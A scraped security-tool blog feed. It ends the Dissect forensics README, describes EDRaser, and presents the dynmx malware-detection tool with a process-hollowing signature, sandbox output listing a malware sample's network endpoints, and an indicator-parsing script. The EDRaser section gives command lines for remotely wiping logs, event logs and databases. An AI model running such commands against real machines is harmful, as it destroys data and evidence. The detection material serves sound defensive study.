target="_blank" title="dissect.fat">dissect.fat</a></li> <li><a href="https://github.com/fox-it/dissect.ffs" rel="nofollow" target="_blank" title="dissect.ffs">dissect.ffs</a></li> <li><a href="https://github.com/fox-it/dissect.hypervisor" rel="nofollow" target="_blank" title="dissect.hypervisor">dissect.hypervisor</a></li> <li><a href="https://github.com/fox-it/dissect.ntfs" rel="nofollow" target="_blank" title="dissect.ntfs">dissect.ntfs</a></li> <li><a 
href="https://github.com/fox-it/dissect.ole" rel="nofollow" target="_blank" title="dissect.ole">dissect.ole</a></li> <li><a href="https://github.com/fox-it/dissect.regf" rel="nofollow" target="_blank" title="dissect.regf">dissect.regf</a></li> <li><a href="https://github.com/fox-it/dissect.sql" rel="nofollow" target="_blank" title="dissect.sql">dissect.sql</a></li> <li><a href="https://github.com/fox-it/dissect.squashfs" rel="nofollow" target="_blank" title="dissect.squashfs">dissect.squashfs</a></li> <li><a href="https://github.com/fox-it/dissect.target" rel="nofollow" target="_blank" title="dissect.target">dissect.target</a></li> <li><a href="https://github.com/fox-it/dissect.thumbcache" rel="nofollow" target="_blank" title="dissect.thumbcache">dissect.thumbcache</a></li> <li><a href="https://github.com/fox-it/dissect.util" rel="nofollow" target="_blank" title="dissect.util">dissect.util</a></li> <li><a href="https://github.com/fox-it/dissect.vmfs" rel="nofollow" target="_blank" title="dissect.vmfs">dissect.vmfs</a></li> <li><a href="https://github.com/fox-it/dissect.volume" rel="nofollow" target="_blank" title="dissect.volume">dissect.volume</a></li> <li><a href="https://github.com/fox-it/dissect.xfs" rel="nofollow" target="_blank" title="dissect.xfs">dissect.xfs</a></li> </ul> <h3 dir="auto" tabindex="-1">Related</h3> <p dir="auto">These projects are closely related to Dissect, but not installed by this meta package.</p> <ul dir="auto"> <li><a href="https://github.com/fox-it/acquire" rel="nofollow" target="_blank" title="acquire">acquire</a></li> <li><a href="https://github.com/fox-it/flow.record" rel="nofollow" target="_blank" title="flow.record">flow.record</a></li> </ul> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">This project is part of the Dissect framework and requires Python.</p> <p dir="auto">Information on the supported Python versions can be found in the Getting Started section of <a 
href="https://docs.dissect.tools/en/latest/index.html#getting-started" rel="nofollow" target="_blank" title="the documentation">the documentation</a>.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto"><code>dissect</code> is available on <a href="https://pypi.org/project/dissect/" rel="nofollow" target="_blank" title="PyPI">PyPI</a>.</p> <div><pre><code>pip install dissect</code></pre></div> <h2 dir="auto" tabindex="-1">Build and test instructions</h2> <p dir="auto">This project uses <code>tox</code> to build source and wheel distributions. Run the following command from the root folder to build these:</p> <div><pre><code>tox -e build</code></pre></div> <p dir="auto">The build artifacts can be found in the <code>dist/</code> directory.</p> <p dir="auto"><code>tox</code> is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:</p> <div><pre><code>tox</code></pre></div> <p dir="auto">For a more elaborate explanation on how to build and test the project, please see <a href="https://docs.dissect.tools/en/latest/contributing/tooling.html" rel="nofollow" target="_blank" title="the documentation">the documentation</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/fox-it/dissect" rel="nofollow" target="_blank" title="Download Dissect">Download Dissect</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-41404623226660087292023-09-24T08:30:00.018-03:002023-09-24T08:30:00.135-03:00EDRaser - Tool For Remotely Deleting Access Logs, Windows Event Logs, Databases, And Other Files<div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFoaBoTxfltIJbJRhe4FpaYwyLfk51cNTbOaiUqcP67TJxzWbWNFpQZloNRelD7Nsq1-6ZLnmYqgTucqa60cUKj6UKP1h2sHdYSNRBUDF3rom-CeE9Wdu218kyOC_U_IHtmbMCUbUd815U_h3-OQF6g0x4U73qaFnpNSoiWs8un9vUrUUOdF9PR_nagyIb/s987/HTMLSmuggler.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="987" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFoaBoTxfltIJbJRhe4FpaYwyLfk51cNTbOaiUqcP67TJxzWbWNFpQZloNRelD7Nsq1-6ZLnmYqgTucqa60cUKj6UKP1h2sHdYSNRBUDF3rom-CeE9Wdu218kyOC_U_IHtmbMCUbUd815U_h3-OQF6g0x4U73qaFnpNSoiWs8un9vUrUUOdF9PR_nagyIb/w640-h332/HTMLSmuggler.png" width="640" /></a></div><p><br /></p> <p dir="auto">EDRaser is a powerful tool for remotely deleting access logs, Windows event logs, databases and other files on remote machines. It offers two modes of operation: <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> and manual.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Automated Mode</h3> <p dir="auto">In automated mode, EDRaser scans the class C network of a given IP address space for <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> systems and attacks them automatically. The attacks in auto mode are:</p> <ul dir="auto"> <li>Remote deletion of web server logs.</li> <li>Syslog deletion (on Linux).</li> <li>Local deletion of Windows Application event logs.</li> <li>Remote deletion of Windows event logs.</li> <li>VMX + VMDK deletion.</li> </ul> <p dir="auto">To use EDRaser in automated mode, run:</p> <div><pre><code>python edraser.py --auto<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Manual Mode</h3> <p dir="auto">In manual mode, you can select specific attacks to launch against a targeted system, giving you greater control. 
Note that some attacks, such as VMX deletion, are for the local machine only.</p> <p dir="auto">To use EDRaser in manual mode, use the following syntax:</p> <div><pre><code>python edraser.py --ip &lt;ip_addr&gt; --attack &lt;attack_name&gt; [--sigfile &lt;signature file&gt;]<br /></code></pre></div> <p dir="auto">Arguments:</p> <ul dir="auto"> <li><code>--ip</code>: scan IP addresses in the specified range and attack vulnerable systems (default: localhost).</li> <li><code>--sigfile</code>: use the specified encrypted signature DB (default: signatures.db).</li> <li><code>--attack</code>: attack to be executed. The following attacks are available: ['vmx', 'vmdk', 'windows_security_event_log_remote', 'windows_application_event_log_local', 'syslog', 'access_logs', 'remote_db', 'local_db', 'remote_db_webserver']</li> </ul> <p dir="auto">Optional arguments:</p> <ul dir="auto"> <li><code>port</code>: port of the remote machine</li> <li><code>db_username</code>: the <a href="https://www.kitploit.com/search/label/Username" target="_blank" title="username">username</a> of the remote DB.</li> <li><code>db_password</code>: the password of the remote DB.</li> <li><code>db_type</code>: type of the DB; EDRaser supports <code>mysql</code> and <code>sqlite</code> (note that for sqlite no username/password is needed).</li> <li><code>db_name</code>: the name of the remote DB to connect to</li> <li><code>table_name</code>: the name of the remote table to connect to</li> <li><code>rpc_tools</code>: path to the VMware rpc_tools</li> </ul> <p dir="auto">Example:</p> <div><pre><code>python edraser.py --attack windows_event_log --ip 192.168.1.133 <br /><br />python EDRaser.py -attack remote_db -db_type mysql -db_username test_user -db_password test_password -ip 192.168.1.10<br /></code></pre></div> <h3 dir="auto" tabindex="-1">DB web server</h3> <p dir="auto">You can bring up a web interface for inserting and viewing a remote DB. 
This can be done with the following command:</p> <div><pre><code>EDRaser.py -attack remote_db_webserver -db_type mysql -db_username test_user -db_password test_password -ip 192.168.1.10<br /></code></pre></div> <p dir="auto">This brings up a web server at localhost:8080 that lets you view and insert data in a given remote DB. The feature is designed to give an example of a "real world" scenario in which a website takes the data you enter and keeps it in a remote DB; you can use it to manually insert data into a remote DB.</p> <h3 dir="auto" tabindex="-1">Available Attacks</h3> <p dir="auto">In manual mode, EDRaser displays a list of available attacks. Here's a brief description of each attack:</p> <ol dir="auto"> <li>Windows Event Logs: Deletes Windows event logs from the remote targeted system.</li> <li>VMware Exploit: Deletes the VMX and VMDK files on the host machine. This attack works only on the <a href="https://www.kitploit.com/search/label/Localhost" target="_blank" title="localhost">localhost</a> machine in a VMware environment by modifying the VMX file or directly writing to the VMDK files.</li> <li>Web Server Logs: Deletes access logs from web servers running on the targeted system by sending a malicious string user-agent that is written to the access-log files.</li> <li>SysLogs: Deletes syslog from Linux machines running Kaspersky EDR without being .</li> <li>Database: Deletes all data from the remotely targeted database.</li> </ol> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SafeBreach-Labs/EDRaser" rel="nofollow" target="_blank" title="Download EDRaser">Download EDRaser</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-32084789295748655062023-09-22T08:30:00.001-03:002023-09-22T08:30:00.132-03:00Dynmx - Signature-based Detection Of Malware Features Based On Windows API Call Sequences<div class="separator" 
style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe74bp8HxRLA3mXvp_kFa9TmaUirflK7-zZKAJ18LcQCKxgPHAuKzXGeA5VBoWHjSJesRqI2PXlUNA4UOr93Cee90nwmys_6z6xYL1pWNjOyw64JjF7nueNjITDhL2JgQesiIkwWvI7G7uzaxBeBnd7yhA2wcsmItOw2f_1z6sAprk0GTcEMVD6HEjkvYU/s866/dynmx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="866" height="540" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe74bp8HxRLA3mXvp_kFa9TmaUirflK7-zZKAJ18LcQCKxgPHAuKzXGeA5VBoWHjSJesRqI2PXlUNA4UOr93Cee90nwmys_6z6xYL1pWNjOyw64JjF7nueNjITDhL2JgQesiIkwWvI7G7uzaxBeBnd7yhA2wcsmItOw2f_1z6sAprk0GTcEMVD6HEjkvYU/w640-h540/dynmx.png" width="640" /></a></div><p><br /></p> <p dir="auto"><em>dynmx</em> (pronounced <em>dynamics</em>) is a signature-based detection approach for behavioural malware features based on Windows API call sequences. In a simplified way, you can think of <em>dynmx</em> as a sort of YARA for API call traces (so-called function logs) originating from malware sandboxes. Hence, the data basis for the detection approach is not the <a href="https://www.kitploit.com/search/label/Malware%20Samples" target="_blank" title="malware samples">malware samples</a> themselves, which would be analysed statically, but the data generated during a <a href="https://www.kitploit.com/search/label/Dynamic%20Analysis" target="_blank" title="dynamic analysis">dynamic analysis</a> of the malware sample in a malware sandbox. 
Currently, <em>dynmx</em> supports function logs of the following malware sandboxes:</p> <ul dir="auto"> <li>VMRay (function log, text-based and XML format)</li> <li>CAPEv2 (<code>report.json</code> file)</li> <li>Cuckoo (<code>report.json</code> file)</li> </ul> <p dir="auto">The detection approach is described in detail in the master thesis <a href="https://github.com/0x534a/master-thesis" rel="nofollow" target="_blank" title="Signature-Based Detection of Behavioural Malware Features with Windows API Calls">Signature-Based Detection of Behavioural Malware Features with Windows API Calls</a>. This project is the prototype implementation of this approach and was developed in the course of the master thesis. The signatures are defined manually by malware analysts in the <em>dynmx</em> signature DSL and can be detected in function logs with the help of this tool. The features and syntax of the <em>dynmx</em> signature DSL can also be found in the master thesis. Furthermore, you can find sample dynmx signatures in the repository <a href="https://github.com/0x534a/dynmx-signatures" rel="nofollow" target="_blank" title="dynmx-signatures">dynmx-signatures</a>. In addition to detecting malware features based on API calls, dynmx can extract the OS resources used by the malware (a so-called Access Activity Model). These resources are extracted by examining the API calls and reconstructing operations on OS resources. Currently, OS resources of the categories filesystem, registry and network are considered in the model.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Example</h2> <p dir="auto">In the following section, examples are shown for the detection of malware features and for the extraction of resources.</p> <h3 dir="auto" tabindex="-1">Detection</h3> <p dir="auto">For this example, we choose the malware sample with the SHA-256 hash sum <code>c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3</code>. 
According to <a href="https://bazaar.abuse.ch/sample/c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3/" rel="nofollow" target="_blank" title="MalwareBazaar">MalwareBazaar</a>, the sample belongs to the malware family <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey" rel="nofollow" target="_blank" title="Amadey">Amadey</a>. There is a public <a href="https://www.vmray.com/analyses/_mb/c0832b1008aa/report/overview.html" rel="nofollow" target="_blank" title="VMRay analysis report">VMRay analysis report</a> of this sample available, which also provides the <a href="https://www.vmray.com/analyses/_mb/c0832b1008aa/logs/flog.txt" rel="nofollow" target="_blank" title="function log">function log</a> traced by VMRay. This function log is the data basis we will use for the detection.</p> <p dir="auto">If we want to know whether the malware sample uses the injection technique called <a href="https://attack.mitre.org/techniques/T1055/012/" rel="nofollow" target="_blank" title="Process Hollowing">Process Hollowing</a>, we can try to detect the following <em>dynmx</em> signature in the function log.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" dir="auto"><pre><code>dynmx_signature:<br />  meta:<br />    name: process_hollow<br />    title: Process Hollowing<br />    description: Detection of Process hollowing malware feature<br />  detection:<br />    proc_hollow:<br />      # Create legit process in suspended mode<br />      - api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"]<br />        with:<br />          - argument: "dwCreationFlags"<br />            operation: "flag is set"<br />            value: 0x4<br />          - return_value: "return"<br />            operation: "is not"<br />            value: 0<br />        store:<br />          - name: "hProcess"<br />            as: "proc_handle"<br />          - name: "hThread"<br />            as: "thread_handle"<br />      # Injection of malicious code into memory of previously created process<br />      - variant:<br />        - path:<br />          # Allocate memory with read, write, execute permission<br />          - api_call: ["VirtualAllocEx", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"]<br />            with:<br />              - argument: ["hProcess", "ProcessHandle"]<br />                operation: "is"<br />                value: "$(proc_handle)"<br />              - argument: ["flProtect", "Protect"]<br />                operation: "is"<br />                value: 0x40<br />          - api_call: ["WriteProcessMemory"]<br />            with:<br />              - argument: "hProcess"<br />                operation: "is"<br />                value: "$(proc_handle)"<br />          - api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"]<br />            with:<br />              - argument: "hThread"<br />                operation: "is"<br />                value: "$(thread_handle)"<br />        - path:<br />          # Map memory section with read, write, execute permission<br />          - api_call: "(Nt|Zw)MapViewOfSection"<br />            with:<br />              - argument: "ProcessHandle"<br />                operation: "is"<br />                value: "$(proc_handle)"<br />              - argument: "AccessProtection"<br />                operation: "is"<br />                value: 0x40<br />      # Resume thread to run injected malicious code<br />      - api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"]<br />        with:<br />          - argument: ["hThread", "ThreadHandle"]<br />            operation: "is"<br />            value: "$(thread_handle)"<br />    condition: proc_hollow as sequence</code></pre></div> <p dir="auto">Based on the signature, we can see some of the DSL features that make <em>dynmx</em> powerful:</p> <ul dir="auto"> <li>Definition of API call sequences with alternative paths</li> <li>Matching of API call function names with regular expressions</li> <li>Matching of argument and return values with several operators</li> <li>Storage of variables, e.g. in order to track handles in the API call sequence</li> <li>Definition of a detection condition with boolean operators (<code>AND</code>, <code>OR</code>, <code>NOT</code>)</li> </ul> <p dir="auto">If we run <em>dynmx</em> with the signature shown above against the function log of the sample <code>c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3</code>, we get the following output indicating that the signature was detected.</p> <div><pre><code>$ python3 dynmx.py detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml<br /><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /> <br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Parsing 1 function log(s)<br />[+] Loaded 1 dynmx signature(s)<br />[+] Starting detection process with 1 worker(s). This probably takes some time...<br /><br />[+] Result<br />process_hollow c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt<br /></code></pre></div> <p dir="auto">We can get into more detail by setting the output format to <code>detail</code>. Now we can see the exact API call sequence that was detected in the function log. Furthermore, we can see that the signature was detected in the process <code>51f0.exe</code>.</p> <div><pre><code>$ python3 dynmx.py -f detail detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml<br /><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /> <br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Parsing 1 function log(s)<br />[+] Loaded 1 dynmx signature(s)<br />[+] Starting detection process with 1 worker(s). This probably takes some time...<br /><br />[+] Result<br />Function log: c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt<br />  Signature: process_hollow<br />    Process: 51f0.exe (PID: 3768)<br />      Number of Findings: 1<br />      Finding 0<br />        proc_hollow : API Call CreateProcessA (Function log line 20560, index 938)<br />        proc_hollow : API Call VirtualAllocEx (Function log line 20566, index 944)<br />        proc_hollow : API Call WriteProcessMemory (Function log line 20573, index 951)<br />        proc_hollow : API Call SetThreadContext (Function log line 20574, index 952)<br />        proc_hollow : API Call ResumeThread (Function log line 20575, index 953)<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Resources</h3> <p dir="auto">In order to extract the accessed OS resources from a function log, we can simply run the <em>dynmx</em> command <code>resources</code> against the function log. 
An example of the detailed output is shown below for the sample with the SHA-256 hash sum <code>601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9</code>. This is a CAPE sandbox report which is part of the <a href="https://github.com/avast/avast-ctu-cape-dataset" rel="nofollow" target="_blank" title="Avast-CTU Public CAPEv2 Dataset">Avast-CTU Public CAPEv2 Dataset</a>.</p>
<div><pre><code>$ python3 dynmx.py -f detail resources --input 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json<br /><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /><br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Parsing 1 function log(s)<br />[+] Processing function log(s) with the command 'resources'...<br /><br />[+] Result<br />Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json (/Users/sijansen/Documents/dev/dynmx_flogs/cape/Public_Avast_CTU_CAPEv2_Dataset_Full/extracted/601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json)<br /> Process: 601941F00B194587C9E5.exe (PID: 2008)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)<br /> Process: 601941F00B194587C9E5.exe (PID: 1800)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> [...]<br /> C:\Users\comp\AppData\Local\vscmouse (READ)<br /> C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> [...]<br /> Process: vscmouse.exe (PID: 900)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)<br /> Process: vscmouse.exe (PID: 3036)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)<br /> C:\ (READ)<br /> C:\Windows\System32\uxtheme.dll (EXECUTE)<br /> dwmapi.dll (EXECUTE)<br /> advapi32.dll (EXECUTE)<br /> shell32.dll (EXECUTE)<br /> C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)<br /> C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)<br /> crypt32.dll (EXECUTE)<br /> urlmon.dll (EXECUTE)<br /> userenv.dll (EXECUTE)<br /> wininet.dll (EXECUTE)<br /> wtsapi32.dll (EXECUTE)<br /> CRYPTSP.dll (EXECUTE)<br /> CRYPTBASE.dll (EXECUTE)<br /> ole32.dll (EXECUTE)<br /> OLEAUT32.dll (EXECUTE)<br /> C:\Windows\SysWOW64\oleaut32.dll (EXECUTE)<br /> IPHLPAPI.DLL (EXECUTE)<br /> DHCPCSVC.DLL (EXECUTE)<br /> C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ (CREATE)<br /> C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> [...]<br /> Network:<br /> 24.151.31.150:465 (READ)<br /> http://24.151.31.150:465 (READ,WRITE)<br /> 107.10.49.252:80 (READ)<br /> http://107.10.49.252:80 (READ,WRITE)<br /></code></pre></div>
<p dir="auto">From the output above and the resources it lists, we can deduce some malware features:</p> <ul dir="auto"> <li>Within the process <code>601941F00B194587C9E5.exe</code> (PID: 1800), the Zone Identifier of the file <code>C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe</code> is deleted</li> <li>Some DLLs are loaded dynamically</li> <li>The process <code>vscmouse.exe</code> (PID: 3036) connects to the network endpoints <code>http://24.151.31.150:465</code> and <code>http://107.10.49.252:80</code></li> </ul> <p dir="auto">The accessed resources are useful for identifying host- and network-based detection indicators. In addition, resources can be used in <em>dynmx</em> signatures. A popular example is the detection of <a href="https://www.kitploit.com/search/label/Persistence" target="_blank" title="persistence">persistence</a> mechanisms in the Registry.</p>
<div><h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">In order to use the software, Python 3.9 must be available on the target system. In addition, the following Python packages need to be installed:</p> <ul dir="auto"> <li><code>anytree</code>,</li> <li><code>lxml</code>,</li> <li><code>pyparsing</code>,</li> <li><code>PyYAML</code>,</li> <li><code>six</code> and</li> <li><code>stringcase</code></li> </ul> <p dir="auto">To install the packages, run the <code>pip3</code> command shown below. It is recommended to use a Python virtual environment instead of installing the packages system-wide.</p> <div><pre><code>pip3 install -r requirements.txt<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">To use the prototype, simply run the main entry point <code>dynmx.py</code>. 
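</p>
<p dir="auto">The <code>resources</code> listing shown above can be turned into indicator candidates mechanically. The following Python is an added example, not part of <em>dynmx</em> or of this post: it parses the text layout of that output (a <code>Process:</code> header per process, <code>Filesystem:</code>/<code>Registry:</code>/<code>Network:</code> sections, one <code>resource (ACCESS,...)</code> entry per line) and derives the host- and network-based indicators discussed above. The embedded sample is a trimmed copy of the listing plus one constructed Run-key line that is not in the original report; the rule set, the function names and the output tuple layout are the example's own assumptions.</p>

```python
import re

# Constructed sample: a trimmed copy of the `dynmx resources` listing shown above,
# plus one constructed HKCU Run-key line (not in the original report) so that the
# registry persistence rule has something to match.
SAMPLE_REPORT = r"""
[+] Result
Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json
 Process: 601941F00B194587C9E5.exe (PID: 1800)
  Filesystem:
   C:\Windows\SysWOW64\ntdll.dll (READ)
   KERNEL32.dll (EXECUTE)
   [...]
   C:\Users\comp\AppData\Local\vscmouse (READ)
   C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)
  Registry:
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
 Process: vscmouse.exe (PID: 3036)
  Filesystem:
   C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)
   C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)
   C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)
  Registry:
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\vscmouse (WRITE)
  Network:
   24.151.31.150:465 (READ)
   http://24.151.31.150:465 (READ,WRITE)
   107.10.49.252:80 (READ)
   http://107.10.49.252:80 (READ,WRITE)
"""

PROCESS_RE = re.compile(r"^Process:\s+(?P<image>\S+)\s+\(PID:\s+(?P<pid>\d+)\)$")
ENTRY_RE = re.compile(r"^(?P<resource>.+?)\s+\((?P<access>[A-Z]+(?:,[A-Z]+)*)\)$")
SECTIONS = {"Filesystem:": "filesystem", "Registry:": "registry", "Network:": "network"}
ZONE_SUFFIX = ":Zone.Identifier"


def parse_resources(report):
    """Map (image, pid) -> {section: [(resource, {access, ...}), ...]}."""
    processes, current, section = {}, None, None
    for raw in report.splitlines():
        line = raw.strip()
        if not line or line == "[...]" or line.startswith(("[+]", "Function log:")):
            continue
        m = PROCESS_RE.match(line)
        if m:
            current = (m["image"], int(m["pid"]))
            processes[current] = {name: [] for name in SECTIONS.values()}
            section = None
            continue
        if line in SECTIONS:
            section = SECTIONS[line]
            continue
        m = ENTRY_RE.match(line)
        if m and current is not None and section is not None:
            processes[current][section].append((m["resource"], set(m["access"].split(","))))
    return processes


def derive_indicators(processes):
    """Apply simple, assumed rules to the parsed accesses; return (kind, rule, value, image, pid)."""
    indicators = []
    for (image, pid), sections in processes.items():
        for resource, access in sections["filesystem"]:
            # Deleting the Zone.Identifier stream strips the Mark-of-the-Web from the file.
            if resource.endswith(ZONE_SUFFIX) and "DELETE" in access:
                indicators.append(("host", "motw_removed", resource[:-len(ZONE_SUFFIX)], image, pid))
            # An executable created under the user profile is a typical dropped payload.
            elif "CREATE" in access and "\\AppData\\" in resource and resource.lower().endswith(".exe"):
                indicators.append(("host", "exe_dropped", resource, image, pid))
        for resource, access in sections["registry"]:
            # A write below a Run key is the classic Registry persistence mechanism.
            if "WRITE" in access and "\\CurrentVersion\\Run" in resource:
                indicators.append(("host", "run_key_write", resource, image, pid))
        seen = set()
        for resource, _access in sections["network"]:
            # The tool lists both "host:port" and "http://host:port"; collapse them to one endpoint.
            endpoint = resource.split("://", 1)[-1].rstrip("/")
            if endpoint not in seen:
                seen.add(endpoint)
                indicators.append(("network", "endpoint", endpoint, image, pid))
    return indicators


if __name__ == "__main__":
    for indicator in derive_indicators(parse_resources(SAMPLE_REPORT)):
        print("\t".join(str(field) for field in indicator))
```

<p dir="auto">Resource names are kept exactly as the tool prints them; a real pipeline would normalise case, expand profile paths and resolve bare DLL names before exporting the host indicators, and would check the network endpoints against known infrastructure rather than treating every contacted address as malicious.</p>
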